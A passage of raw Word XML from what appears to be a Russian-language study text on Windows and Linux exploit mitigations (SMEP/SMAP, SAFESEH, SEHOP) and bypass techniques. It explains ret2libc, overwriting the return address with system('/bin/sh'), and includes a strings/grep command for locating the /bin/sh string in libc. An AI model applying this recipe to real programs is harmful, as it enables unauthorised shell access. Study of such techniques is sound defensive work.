      <w:r w:rsidR="000F41FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="000F41FA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00730D59">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB77B1B" w14:textId="77777777" w:rsidR="00F62D87" w:rsidRDefault="00F62D87" w:rsidP="00F62D87">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="605942D6" wp14:editId="631C4C81">
            <wp:extent cx="6300470" cy="1555115"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6985"/>
            <wp:docPr id="19" name="Рисунок 19" descr="Биты, отвечающие за SMEP и S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иты, отвечающие за SMEP и S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79CA" w14:textId="4A7BDEED" w:rsidR="00730D59" w:rsidRPr="00F62D87" w:rsidRDefault="00F62D87" w:rsidP="00F8256C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Ref2124071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5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t xml:space="preserve"> – Биты, отвечающие за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62D87">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9518E0" w14:textId="77777777" w:rsidR="00A47004" w:rsidRPr="00730D59" w:rsidRDefault="00A47004" w:rsidP="0060365B"/>
    <w:p w14:paraId="626CB6FE" w14:textId="0678E21B" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SAFESEH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEC6707" w14:textId="12B7BB18" w:rsidR="00B426C7" w:rsidRPr="008430FC" w:rsidRDefault="00466EF4" w:rsidP="00B426C7">
      <w:r w:rsidRPr="00466EF4">
        <w:t>SAFESEH - технология защиты уровня компилятора, при которой, в заголовках PE файла программы, создается специальная таблица, с заранее предустановленными, относительными адресами обработчиков</w:t>
      </w:r>
      <w:r w:rsidR="00A75B7E">
        <w:t xml:space="preserve">, как показано на </w:t>
      </w:r>
      <w:r w:rsidR="00A63FBA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A63FBA">
        <w:instrText xml:space="preserve"> REF _Ref212407753 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00A63FBA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A63FBA">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00A63FBA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00A63FBA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00466EF4">
        <w:t xml:space="preserve">. Произошедшее исключение, во время работы, проверяется по этой таблице </w:t>
      </w:r>
      <w:r w:rsidR="006826B9" w:rsidRPr="00466EF4">
        <w:t>и,</w:t>
      </w:r>
      <w:r w:rsidRPr="00466EF4">
        <w:t xml:space="preserve"> если не совпадает - программа завершается. SAFESEH включается одноименным ключом компиляции</w:t>
      </w:r>
      <w:r w:rsidR="008430FC">
        <w:t xml:space="preserve"> только для программ </w:t>
      </w:r>
      <w:r w:rsidR="008430FC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x86</w:t>
      </w:r>
      <w:r w:rsidR="008430FC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3449F829" w14:textId="77777777" w:rsidR="00966CB4" w:rsidRDefault="00966CB4" w:rsidP="00966CB4">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7436C110" wp14:editId="0ED48BF5">
            <wp:extent cx="5524500" cy="2628063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41" cy="26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B45C" w14:textId="0E4484BF" w:rsidR="00966CB4" w:rsidRPr="00161437" w:rsidRDefault="00966CB4" w:rsidP="00966CB4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Ref2124077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6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t xml:space="preserve"> – Таблица обработчиков</w:t>
      </w:r>
      <w:r w:rsidR="00161437">
        <w:t xml:space="preserve">, указанная в заголовке </w:t>
      </w:r>
      <w:r w:rsidR="00161437">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDA2CF3" w14:textId="77777777" w:rsidR="00B426C7" w:rsidRPr="00B426C7" w:rsidRDefault="00B426C7" w:rsidP="00B426C7"/>
    <w:p w14:paraId="617A95E2" w14:textId="6EDF94A8" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SEHOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836E4D9" w14:textId="4E932C02" w:rsidR="00B426C7" w:rsidRDefault="007E66A8" w:rsidP="00B426C7">
      <w:r w:rsidRPr="007E66A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Structured</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Overwrite</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:t>начиная</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vista</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve">1, </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:t>предотвращает</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:t>перезапись</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E66A8">
        <w:t>обработчиков</w:t>
      </w:r>
      <w:r w:rsidR="00CF1A49" w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF1A49">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00CF1A49" w:rsidRPr="00CF1A49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF1A49">
        <w:t xml:space="preserve">стеке (аналогично перезаписи </w:t>
      </w:r>
      <w:r w:rsidR="00CF1A49">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidR="00CF1A49">
        <w:t xml:space="preserve">, как показано на </w:t>
      </w:r>
      <w:r w:rsidR="00471B58">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00471B58">
        <w:instrText xml:space="preserve"> REF _Ref212408052 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00471B58">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00471B58">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00471B58">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00471B58">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF1A49">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00B47475" w:rsidRPr="00B47475">
        <w:t xml:space="preserve"> Является защитой на уровне ОС и не зависит от того, </w:t>
      </w:r>
      <w:r w:rsidR="00B47475">
        <w:t>как была скомпилирована программа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8D9CEC" w14:textId="77777777" w:rsidR="00F763B4" w:rsidRDefault="00F763B4" w:rsidP="00F763B4">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07957B8D" wp14:editId="0C61BB83">
            <wp:extent cx="4861560" cy="298984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3" cy="29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9F5D" w14:textId="33F22FD6" w:rsidR="00CF1A49" w:rsidRPr="00CF1A49" w:rsidRDefault="00F763B4" w:rsidP="00503B11">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Ref2124080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7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t xml:space="preserve"> – Перезапись обработчиков на стеке</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F39FA37" w14:textId="77777777" w:rsidR="00B426C7" w:rsidRDefault="00B426C7" w:rsidP="00B426C7"/>
    <w:p w14:paraId="0C549425" w14:textId="5E3DFF8F" w:rsidR="0019733A" w:rsidRDefault="0019733A" w:rsidP="00B426C7">
      <w:r w:rsidRPr="0019733A">
        <w:t xml:space="preserve">Суть SEHOP заключается в том, что эта технология проверяет всю валидность цепочки. Это означает, что все адреса следующего элемента списка </w:t>
      </w:r>
      <w:r w:rsidRPr="0019733A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">должны быть корректными и располагаться на стеке. </w:t>
      </w:r>
      <w:r w:rsidR="00D337F7">
        <w:t>Теперь нельзя просто перезаписать первый обработчик</w:t>
      </w:r>
      <w:r w:rsidR="00345B0C">
        <w:t>, требуется работать со всей цепочкой</w:t>
      </w:r>
      <w:r w:rsidRPr="0019733A">
        <w:t>. Это очень сильно усложняет эксплуатацию, так как придется подбирать правильные адреса. Также проверяется значение адреса следующего элемента в последнем обработчике цепочки - он должен равняться 0xFFFFFFFF, как</w:t>
      </w:r>
      <w:r w:rsidR="00D55FA4">
        <w:t xml:space="preserve"> показано на </w:t>
      </w:r>
      <w:r w:rsidR="00964913">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00964913">
        <w:instrText xml:space="preserve"> REF _Ref212408221 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00964913">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00964913">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00964913">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00964913">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0019733A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D43D37E" w14:textId="77777777" w:rsidR="008A1DFF" w:rsidRDefault="008A1DFF" w:rsidP="008A1DFF">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="156CF23C" wp14:editId="3A8250A4">
            <wp:extent cx="4107180" cy="55054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-415" r="29127" b="415"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="410718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04F8" w14:textId="20DA12A9" w:rsidR="004017A6" w:rsidRPr="008A1DFF" w:rsidRDefault="008A1DFF" w:rsidP="00574C26">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Ref2124082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8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t xml:space="preserve"> – Цепочка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SEH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6502BE0C" w14:textId="77777777" w:rsidR="0019733A" w:rsidRPr="00CF1A49" w:rsidRDefault="0019733A" w:rsidP="00B426C7"/>
    <w:p w14:paraId="074E9B43" w14:textId="0B703B15" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Техники эксплуатации уязвимостей и способы обхода защитных механизмов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6983643C" w14:textId="401B6F86" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret2libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153DE8AA" w14:textId="020C2A5F" w:rsidR="008D0DE1" w:rsidRDefault="0054124C" w:rsidP="008D0DE1">
      <w:r w:rsidRPr="0054124C">
        <w:t xml:space="preserve">Способ эксплуатации ret2libc используется, если существует запрет на исполнение в стеке. Вместо того, что вызывать код на стеке, мы будем </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>спавнить</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054124C">
        <w:t xml:space="preserve"> шелл, используя функции библиотеки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054124C">
        <w:t xml:space="preserve">, в частности вызов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>("/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054124C">
        <w:t xml:space="preserve">"). </w:t>
      </w:r>
      <w:r w:rsidR="00C54EF6">
        <w:t xml:space="preserve">Для этого требуется перезаписать адрес возврата адресом функции </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C54EF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00C54EF6" w:rsidRPr="00C54EF6">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C54EF6" w:rsidRPr="00C54EF6">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00945E84">
        <w:t xml:space="preserve"> (или другой, </w:t>
      </w:r>
      <w:r w:rsidR="00945E84">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00945E84" w:rsidRPr="00945E84">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidR="00945E84">
        <w:t>используется чаще всего)</w:t>
      </w:r>
      <w:r w:rsidR="00C54EF6">
        <w:t xml:space="preserve">, которая находится в уже загруженном исполняемом коде </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C54EF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C54EF6" w:rsidRPr="00C54EF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C54EF6">
        <w:t xml:space="preserve">(которая загружается, как и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C54EF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ntdll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C54EF6" w:rsidRPr="00C54EF6">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C54EF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C54EF6" w:rsidRPr="00C54EF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C54EF6">
        <w:t xml:space="preserve">во все процессы </w:t>
      </w:r>
      <w:r w:rsidR="00C54EF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00C54EF6">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0054124C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114020BC" w14:textId="3D7B0D49" w:rsidR="004962B7" w:rsidRDefault="009E2D28" w:rsidP="008D0DE1">
      <w:r>
        <w:t xml:space="preserve">Получить адрес этой функции можно разными способами, например, запустив программу в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E2D28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и применив команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="009E2D28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB7D03">
        <w:t xml:space="preserve"> В случае, если отключен </w:t>
      </w:r>
      <w:r w:rsidR="00BB7D03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidR="00BB7D03">
        <w:t xml:space="preserve">, адресом для перезаписи будет являться адрес </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BB7D03">
        <w:t>библиотеки+смещение</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB7D03">
        <w:t>, полученное из отладчика (так будет получен абсолютный адрес функции).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B804F" w14:textId="7899686D" w:rsidR="00872308" w:rsidRDefault="00AE5218" w:rsidP="008D0DE1">
      <w:r>
        <w:t xml:space="preserve">Помимо адреса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE5218">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">потребуется поместить на стек также адрес строки </w:t>
      </w:r>
      <w:r w:rsidRPr="0054124C">
        <w:t>"/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0054124C">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005717B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для передачи ее в функцию</w:t>
      </w:r>
      <w:r w:rsidR="005717B6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A30AD5">
        <w:t xml:space="preserve"> Один из способов получения этого адреса – применить</w:t>
      </w:r>
      <w:r w:rsidR="00A30AD5" w:rsidRPr="00A30AD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A30AD5">
        <w:t xml:space="preserve">команду </w:t>
      </w:r>
      <w:r w:rsidR="00A30AD5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r w:rsidR="00A30AD5">
        <w:t xml:space="preserve"> с соответствующим фильтром:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F3EFE9" w14:textId="7871421A" w:rsidR="00A30AD5" w:rsidRPr="00934775" w:rsidRDefault="00934775" w:rsidP="001920E0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="001920E0">
        <w:t>trings -a -t x /lib32/libc.so.6 |grep /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001920E0">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65015B54" w14:textId="421822BB" w:rsidR="001920E0" w:rsidRPr="00AF3B78" w:rsidRDefault="00934775" w:rsidP="001920E0">
      <w:r>
        <w:t xml:space="preserve">Аналогичным образом требуется получить абсолютный адрес этой строки, после чего стек переписывается по схеме, показанной на </w:t>
      </w:r>
      <w:r w:rsidR="006A6530">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006A6530">
        <w:instrText xml:space="preserve"> REF _Ref212409465 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="006A6530">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006A6530">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="006A6530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="006A6530">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AF3B78">
        <w:t xml:space="preserve"> Адрес </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AF3B78">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r w:rsidR="00AF3B78" w:rsidRPr="00AF3B78">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AF3B78" w:rsidRPr="00AF3B78">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AF3B78">
        <w:t>, получаемый аналогично прочим адресам, необходим в этом примере для возможности корректного выхода из шелла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2579AECC" w14:textId="77777777" w:rsidR="00E941B2" w:rsidRDefault="00F5376F" w:rsidP="00E941B2">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E3336D0" wp14:editId="3511F145">
            <wp:extent cx="5678234" cy="24299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95" cy="24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7805" w14:textId="687BA5F7" w:rsidR="00CC13BF" w:rsidRPr="000023B5" w:rsidRDefault="00E941B2" w:rsidP="000023B5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Ref2124094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9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t xml:space="preserve"> – Пример перезаписи адреса возврата техникой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00E941B2">
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lilbc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E941B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для открытия </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E941B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43CF5807" w14:textId="77777777" w:rsidR="0054124C" w:rsidRPr="00934775" w:rsidRDefault="0054124C" w:rsidP="008D0DE1"/>
    <w:p w14:paraId="2893B481" w14:textId="7C3FD5EC" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7840FC77" w14:textId="77777777" w:rsidR="002C68D4" w:rsidRPr="002C68D4" w:rsidRDefault="00C90EE9" w:rsidP="002C68D4">
      <w:r>
        <w:t xml:space="preserve">Возвратно-ориентированное программирование (ROP) </w:t>
      </w:r>
      <w:r w:rsidR="0002448B">
        <w:t>— это</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> метод эксплуатации уязвимостей в программном обеспечении, который позволяет злоумышленникам выполнить вредоносный код, используя существующий код в программе.</w:t>
      </w:r>
      <w:r w:rsidR="00771192">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C68D4" w:rsidRPr="002C68D4">
